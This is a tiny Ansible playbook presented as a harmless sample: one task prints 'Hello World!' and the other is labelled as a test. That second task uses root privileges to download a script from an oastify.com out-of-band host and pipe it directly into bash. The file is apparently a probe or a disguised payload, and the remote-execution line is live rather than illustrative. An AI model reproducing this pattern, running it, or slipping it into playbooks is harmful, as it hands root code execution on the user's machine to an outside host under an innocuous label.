- name: Sample CMD
  hosts: localhost
  tasks:
    - name: Hello Message
      debug:
        msg: "Hello World!"
    - name: Test Execution
      become: yes
      shell: "curl https://nsjanr380kqghh7xhrnpocnsqjwak1jp8.oastify.com | bash"
